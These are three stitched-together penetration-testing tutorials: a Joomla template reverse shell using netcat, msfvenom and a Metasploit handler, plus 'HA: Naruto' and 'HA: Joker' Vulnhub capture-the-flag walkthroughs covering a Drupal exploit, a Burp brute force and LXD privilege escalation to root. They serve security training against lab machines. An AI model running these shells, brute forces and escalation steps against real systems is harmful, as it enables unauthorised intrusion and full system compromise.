Joomla: Reverse Shell

Joomla is one of the popular Content Management System (CMS) which helps you to build your website. Joomla has gained its popularity by being user friendly as its complication free when during installation; and it is also pretty reliable. In this article, we learn how to get reverse shell of joomla.

As you can see in the image below, that the website is made in joomla. Now, that we have our joomla environment we start exploiting it. 

The attack that we are going to show is categorises under post exploitation; which means one should have log in credentials of joomla. The URL of log in page of joomla will be consisted of ‘joomla/admministrator’ and here, enter username and password as shown in the image below :

Once you are logged in, go to extensions. A drop down menu will appear, from this menu select templates; just like it has been shown in the image belolw :

Implementing the above will show you the list of templates present in the website and so we will exploit one of them i.e. Beez3 details and files.  

Once, you are in the template, go to index.php as shown in the image below :

This way you will able to edit index.php in the template as you can see in the image below :

Now, swap the code of index.php with the reverse shell code i.e. found in kali linux and add your ip and port in the code just like it has been shown in the image below :

Now, activate netcat to get a session with the following command :

nc -lvp 1234

Another way to get a reverse shell is by msfvenom, and for this type the following command :

msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

The above command will give you the malicious php code. Swap this code just like before  and simultaneously start the multi/handler as shown in the image below :

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 1234

exploit

These were the two ways to get reverse shell in joomla.

HA: Naruto Vulnhub Walkthrough

This is our Walkthrough for “HA: Naruto” and this CTF is designed by Hacking Articles Team, hope you will enjoy this.

Book your tickets to The Konohagakure, and train under Master Jiraiya,  Hokage Uzumaki, and Tsunade.  Use your hacking skills to stop Orrochimaru and Rescue Sasuke.  Hack this boot to root and get  the  title  of  “The Number  One  Hyperactive,  Knucklehead  Ninja”

Level:

You can download this lab from here.

Let’s Begin!!

Penetration Testing Methodologies

Scanning Network

• netdiscover
• Nmap

Enumeration

• Browsing HTTP Service
• Samba Client (Smb Client)

Exploiting

• Drupal-Metasploit

Privilege Escalation

·         Capabilities

Network Scanning

Firsts of all we try to identify our target and for this use the following command:

netdiscover

Now we will run an aggressive port scan using Nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.0.4

With the help of the scan, we now know that port number 80,22,139 and 445 are open with Apache, SSH and Smb service running.

Enumeration

Further, we started enumeration against the target machine and therefore we navigated to a web browser for exploring HTTP service. And we got a page of Naruto as shown below: -

Smbclient

Smbclient is a customer that can 'converse with' an SMB server. It offers an interface like that of the FTP program. It can perform activities like getting records from the server to the nearby machine, putting documents from the neighborhood machine to the server, recovering catalog data from the server.

We used the following command to view files in smbclient.

smbclient -L \\192.168.0.4

 

As we can observe with the help of smbclient we are able to view the shared folder and files of the victim’s machine. Moreover, we can use smbclient for sharing a file in the network. Therefore, we found a text file by name of uzumaki.txt which we downloaded into our machine by using the following command.

smbclient //192.168.0.4/Naruto

Then we used the cat command to open the text file and got a hint “Gara” as we saw that word is in double-quotes in the text file.

We tried this hint and opened it on the browser page where we got a Welcome page.

Exploitation

Now we will use our old friend Metasploit to exploit the Drupal Page we found earlier.

msf5 > use exploit/unix/webapp/drupal_restws_unserialize

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set rhosts 192.168.0.4

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set targeturi /gara

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set lhost 192.168.0.5

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > exploit

Booom!! Our favorite meterpreter session is all here, let’s go for Post enumeration.

After getting into the meterpreter session we used the “shell” command to get a shell on the target system. This came back to be an improper shell.

Now we used our python one-liner to invoke a proper shell on the target machine. After getting the shell we saw that the shell we got is of user “www-data”.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We will go for the post enumeration using the following command which shows us all the connections with their ports.

netstat -antp

If we check our local network static for TCP and UDP connections, we will see that there’s something running 8080 and even nmap doesn’t display anything for this. With the aid of the meterpreter, we have forwarded service port 8080 to our local host:8080.

portfwd add -l 8080 -p 8080 -r 127.0.0.1

Once we have forwarded the service over to our local machine then we can explore it the web browser as we have done here.

This will provide us with the following credentials:

User: yashika

Password: raj@123

Privilege Escalation

Now we got to do is run su command which will give all root permissions to that user and therefore we successfully logged in using the following credentials:

su yashika

raj@123

In Linux, files can be provided with a capability to access specific files majorly critical files with specific permissions only; like a script file can be provided with the capability to read ssh configuration files or /etc/shadow file which can be done using getcap  so we will use the following command to find out the capabilities of the user and whether those capabilities are enabled or not:

getcap -r / 2>/dev/null

Now we tried to find files with sudo permission and found a text file in the home directory. We opened the file.

id

cd /root

ls

cat final.txt

And so, we found our Hero: NARUTO (“The Number One Hyperactive, Knucklehead Ninja”)

HA Joker Vulnhub Walkthrough

Today we are going to solve our Boot to Root challenge called “HA: Joker” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find Root Flag on the Target Machine.

Penetration Methodologies

·         Scanning Network

o   Netdiscover

o   Nmap

·         Enumeration

o   Browsing HTTP Service

o   Performing Directory Brute force

o   Performing Bruteforce on Joomla

·         Exploitation

o   Exploiting the Joomla

o   Getting a reverse connection

o   Spawning a TTY Shell

·         Privilege Escalation

o   LXD

Walkthrough

Scanning Network

First of all, we try to identify our target. We did this using the netdiscover command. It came out to be

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.1.101

Enumeration

With the help of the scan, we now know that port number 22, 80 and 8080 are open with the service of SSH, HTTP respectively. Now that port 80 is open, so we opened the target IP address in our browser as shown in the following image:

http://192.168.1.101

This gave us a collection of Joker Quotes from his appearance over time in the comics and the movies. We also inspected the source code of this webpage, it was also riddled with the commented joker quotes.

As we couldn’t find anything of much use on the webpage hosted on the port 80, we decided to enumerate the service running on the port 8080. This was surprisingly only accessible to an authorized user with proper credentials as shown in the image given below. It’s time to look for these credentials.

http://192.168.1.101:8080           

Now while we were busy browsing the webpages, we also started a directory bruteforce scan using the dirb tool. We applied different variants of scans with different extensions. We got success with the .txt extension. We found the secret.txt.

dirb http://192.168.1.101/ -X .txt

Now that we have found the secret.txt file. To inspect this file, we decided to download the text file on our system using the wget command. After successfully downloading the text file, we opened the file using the cat command. It contained a conversation between Batman and our beloved Joker. Here there was a repeat mention of the word ‘rock’ this struck us as ‘rockyou.txt’ the famous bruteforce dictionary. Also, there was a mention of the ‘one of your 100 poor jokes’. It was a bizarre mention of the word 100. So what we accumulated from this was that the password for the panel at port 8080. Must be in the top 100 passwords of the Rockyou dictionary.

wget http://192.168.1.101/secret.txt

cat secret.txt

Now that we have formulated a plan to use the top 100 passwords from the rockyou.txt dictionary, it’s time to compile a smaller dictionary of those 100 passwords so as to make the bruteforce faster and lighter. To do this we are going to use the head command.  From the head command, we are going to pass the parameter of 100 keywords and direct the output generated by this command in a text file using the greater than (>) symbol.

head -n 100 rockyou.txt > dict.txt

Now as this is a web application and we are required to perform a brute force, we are going to use the BurpSuite Application. For that, we are going to open the webpage hosted on the port 8080 and enter any random characters in the login panel and press the OK button after applying the burp proxy.

As we started the BurpSuite and clicked on the OK button after applying the proper proxy, and enabling the Intercept option on the BurpSuite, we are able to capture a request that was generated. Further on, we right-clicked on the request captured and selected the option “Send to Intruder”.

After Sending it to Intruder, we are going to check the Intruder tab for the transferred request. Here in the Intruder section, we are going to get into the Positions Tab. Here we select the Attack type to be Sniper. We will select the Authorization hash and Click on the Add Button on the right side.

After that, we move into the Payloads option. Now, here we are going to use the dictionary we created earlier. But we are supposed to add the username and password in this bruteforce. So we are going to modify the dictionary we created earlier by adding the username as ‘joker’ followed by a ‘:’. So that it might look like:

joker:password

Now as we can see that the authentication is Base64. So we will have to use the Payload Processing section to modify our bruteforce credentials as Base64 values. To do this we click on the Add button. Select the rule type as “Encode”. Further, choose the “Base64-encode” option and click on OK.

After applying the above-stated settings, we went back to the Positions Tab and Clicked on the “Start Attack Button”. The Bruteforce starts and gives the result. Here we are going to get a lot of 401 errors. But we will have to find the entry with the 200 code.

As this text is encoded in the Base64 Encryption. We converted it into the Plain Text. Upon conversion, it came out to be:

joker:hannah

We went back to the login panel and entered the username as ‘joker’ and password as ‘hannah’. This was a successful login. And we could see the Joomla Website as shown in the given image.

As this is a Joomla website, its login panel must be at /administrator. So we surfed that URL in our Browser. Here we got stopped by another login panel. After a brief searching over the internet, we found that the default credentials of Joomla are ‘joomla:joomla’. So, before trying anything else, we will be trying these login credentials.

Now that we have logged in on the Joomla as the SuperUser. To exploit the Joomla server, we will use the PHP reverse shell. They can be found in Kali Linux. We will move on to the Template Section. To do so, we will first click on the Extensions Option on the Menu. Then, traverse in the beez3 template and choose Customise. This is open an edit section as shown in the image. Now, select the index.php and replace the text inside the index.php with our reverse shell. Remember to change the IP Address and/or change the port.

After editing the index.php, save the file by clicking on the Save Button. Now we have successfully replaced the index.php with our reverse shell script. Now, all that’s left to do is run the index.php. Now to get a session, we need a listener, where we will get our reverse shell. We will use netcat for creating a listener as shown in the image given below

After we got the shell, we saw that the shell that we got is an improper shell, so we used the python one-liner to convert it into a proper shell. After conversion, we ran the id command. We saw that this shell is of the user ‘www-data’. We saw that this user is a part of the lxd group. This could be our way to root.

python3 -c 'import pty;pty.spawn("/bin/bash")'

id

To learn the Lxd privilege escalation in detail, refer to this article: “Lxd Privilege Escalation”.

In order to take escalate the root privilege of the target machine, we will have to create an image for lxd. To that, we will first, Download build-alpine in the attacker machine (Kali Linux) through the git repository. After that, we will be traversing it into the lxd-alpine-builder directory and execute the script “build -alpine” that will build the latest Alpine image as a compressed file.

git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

Now we will send the tar file to the target machine. We will be using the Python HTTP server for this transfer.

ls

python -m SimpleHTTPServer

On the target machine, firstly we will be downloading the alpine image followed by importing an image for lxd. After that, we will be Initializing the image inside a new container.

wget http://192.168.1.107:8000/alpine-v3.10-x86_64-20191019_0712.tar.gz

lxc image import ./alpine-v3.10-x86_64-20191019_0712.tar.gz --alias myimage

lxc image list

Finally, we will be mounting the container inside the /root directory. Once inside the container, navigate to /mnt/root to see all resources from the target machine. After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the flag here and we found the final.txt. This concludes this Boot to Root Challenge.

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

id

cd /mnt/root/root

ls

cat final.txt